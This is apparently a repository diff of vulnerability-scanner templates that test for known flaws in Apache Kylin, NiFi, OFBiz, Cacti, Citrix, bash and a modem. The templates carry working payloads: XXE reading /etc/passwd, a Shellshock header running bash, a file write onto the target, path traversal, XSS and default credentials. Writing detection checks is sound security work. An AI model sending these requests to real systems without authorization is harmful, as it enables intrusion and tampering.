- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
|
@ -0,0 +1,10 @@
|
|||
name: poc-yaml-apache-kylin-unauth-cve-2020-13937
|
||||
rules:
|
||||
- method: GET
|
||||
path: /kylin/api/admin/config
|
||||
expression: |
|
||||
response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
|
||||
detail:
|
||||
author: JingLing(github.com/shmilylty)
|
||||
links:
|
||||
- https://s.tencent.com/research/bsafe/1156.html
|
|
@ -0,0 +1,12 @@
|
|||
name: poc-yaml-apache-nifi-api-unauthorized-access
|
||||
manual: true
|
||||
transport: http
|
||||
rules:
|
||||
- method: GET
|
||||
path: /nifi-api/flow/current-user
|
||||
follow_redirects: false
|
||||
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
|
||||
detail:
|
||||
author: wulalalaaa(https://github.com/wulalalaaa)
|
||||
links:
|
||||
- https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
|
|
@ -1,4 +1,4 @@
|
|||
name: poc-yaml-apacheofbiz-cve-2018-8033-xxe
|
||||
name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
|
||||
rules:
|
||||
- method: POST
|
||||
path: /webtools/control/xmlrpc
|
||||
|
@ -8,7 +8,7 @@ rules:
|
|||
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
|
||||
follow_redirects: false
|
||||
expression: >
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml")
|
||||
response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: su(https://suzzz112113.github.io/#blog)
|
||||
links:
|
|
@ -11,7 +11,7 @@ rules:
|
|||
version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
|
||||
follow_redirects: false
|
||||
expression: >
|
||||
response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
|
||||
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
|
||||
detail:
|
||||
author: su(https://suzzz112113.github.io/#blog)
|
||||
links:
|
|
@ -0,0 +1,16 @@
|
|||
name: poc-yaml-aspcms-backend-leak
|
||||
rules:
|
||||
- method: GET
|
||||
path: /plug/oem/AspCms_OEMFun.asp
|
||||
expression: |
|
||||
response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)
|
||||
search: >-
|
||||
(?P<path>(/(.*?).asp))
|
||||
- method: GET
|
||||
path: /{{path}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"username")
|
||||
detail:
|
||||
author: Hzllaga
|
||||
links:
|
||||
- https://www.onebug.org/wooyundata/65458.html
|
|
@ -0,0 +1,64 @@
|
|||
name: poc-yaml-backup-file
|
||||
set:
|
||||
host: request.url.domain
|
||||
sets:
|
||||
path:
|
||||
- "sql"
|
||||
- "www"
|
||||
- "wwwroot"
|
||||
- "index"
|
||||
- "backup"
|
||||
- "back"
|
||||
- "data"
|
||||
- "web"
|
||||
- "db"
|
||||
- "database"
|
||||
- "ftp"
|
||||
- "admin"
|
||||
- "upload"
|
||||
- "package"
|
||||
- "sql"
|
||||
- "old"
|
||||
- "test"
|
||||
- "root"
|
||||
- "beifen"
|
||||
- host
|
||||
ext:
|
||||
- "zip"
|
||||
- "7z"
|
||||
- "rar"
|
||||
- "gz"
|
||||
- "tar.gz"
|
||||
- "db"
|
||||
- "bak"
|
||||
|
||||
rules:
|
||||
- method: GET
|
||||
path: /{{path}}.{{ext}}
|
||||
follow_redirects: false
|
||||
continue: true
|
||||
expression: |
|
||||
response.content_type.contains("application/") &&
|
||||
(response.body.startsWith("377ABCAF271C".hexdecode()) ||
|
||||
response.body.startsWith("314159265359".hexdecode()) ||
|
||||
response.body.startsWith("53514c69746520666f726d6174203300".hexdecode()) ||
|
||||
response.body.startsWith("1f8b".hexdecode()) ||
|
||||
response.body.startsWith("526172211A0700".hexdecode()) ||
|
||||
response.body.startsWith("FD377A585A0000".hexdecode()) ||
|
||||
response.body.startsWith("1F9D".hexdecode()) ||
|
||||
response.body.startsWith("1FA0".hexdecode()) ||
|
||||
response.body.startsWith("4C5A4950".hexdecode()) ||
|
||||
response.body.startsWith("504B0304".hexdecode()) )
|
||||
# - "377ABCAF271C" # 7z
|
||||
# - "314159265359" # bz2
|
||||
# - "53514c69746520666f726d6174203300" # SQLite format 3.
|
||||
# - "1f8b" # gz tar.gz
|
||||
# - "526172211A0700" # rar RAR archive version 1.50
|
||||
# - "526172211A070100" # rar RAR archive version 5.0
|
||||
# - "FD377A585A0000" # xz tar.xz
|
||||
# - "1F9D" # z tar.z
|
||||
# - "1FA0" # z tar.z
|
||||
# - "4C5A4950" # lz
|
||||
# - "504B0304" # zip
|
||||
detail:
|
||||
author: shadown1ng(https://github.com/shadown1ng)
|
|
@ -0,0 +1,14 @@
|
|||
name: poc-yaml-bash-cve-2014-6271
|
||||
set:
|
||||
r1: randomInt(800000000, 1000000000)
|
||||
r2: randomInt(800000000, 1000000000)
|
||||
rules:
|
||||
- method: GET
|
||||
headers:
|
||||
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
|
||||
follow_redirects: false
|
||||
expression: response.body.bcontains(bytes(string(r1 + r2)))
|
||||
detail:
|
||||
author: neal1991(https://github.com/neal1991)
|
||||
links:
|
||||
- https://github.com/opsxcq/exploit-CVE-2014-6271
|
|
@ -0,0 +1,15 @@
|
|||
name: poc-yaml-cacti-weathermap-file-write
|
||||
rules:
|
||||
- method: GET
|
||||
path: >-
|
||||
/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7
|
||||
follow_redirects: false
|
||||
expression: response.status == 200
|
||||
- method: GET
|
||||
path: /plugins/weathermap/configs/test.php
|
||||
follow_redirects: false
|
||||
expression: response.status == 200 && response.body.bcontains(b"46ea1712d4b13b55b3f680cc5b8b54e8")
|
||||
detail:
|
||||
author: whynot(https://github.com/notwhy)
|
||||
links:
|
||||
- https://www.secpulse.com/archives/47690.html
|
|
@ -0,0 +1,9 @@
|
|||
name: poc-yaml-chinaunicom-modem-default-password
|
||||
rules:
|
||||
- method: POST
|
||||
path: /cu.html
|
||||
body: >-
|
||||
frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 302 && response.headers["location"] == "/menu.gch"
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-citrix-cve-2019-19781-path-traversal
|
||||
rules:
|
||||
- method: GET
|
||||
path: /vpn/../vpns/cfg/smb.conf
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
|
||||
detail:
|
||||
author: su(https://suzzz112113.github.io/#blog)
|
||||
links:
|
||||
- https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
|
|
@ -0,0 +1,18 @@
|
|||
name: poc-yaml-citrix-cve-2020-8191-xss
|
||||
set:
|
||||
r1: randomLowercase(6)
|
||||
rules:
|
||||
- method: POST
|
||||
path: /menu/stapp
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: >-
|
||||
sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
|
||||
follow_redirects: true
|
||||
expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
|
||||
detail:
|
||||
author: JingLing(https://hackfun.org/)
|
||||
links:
|
||||
- https://support.citrix.com/article/CTX276688
|
||||
- https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
|
||||
- https://dmaasland.github.io/posts/citrix.html
|
|
@ -0,0 +1,20 @@
|
|||
name: poc-yaml-citrix-cve-2020-8193-unauthorized
|
||||
set:
|
||||
user: randomLowercase(8)
|
||||
pass: randomLowercase(8)
|
||||
rules:
|
||||
- method: POST
|
||||
path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
|
||||
headers:
|
||||
Content-Type: application/xml
|
||||
X-NITRO-USER: '{{user}}'
|
||||
X-NITRO-PASS: '{{pass}}'
|
||||
body: <appfwprofile><login></login></appfwprofile>
|
||||
follow_redirects: false
|
||||
expression: >
|
||||
response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
|
||||
detail:
|
||||
author: bufsnake(https://github.com/bufsnake)
|
||||
links:
|
||||
- https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
|
||||
- https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue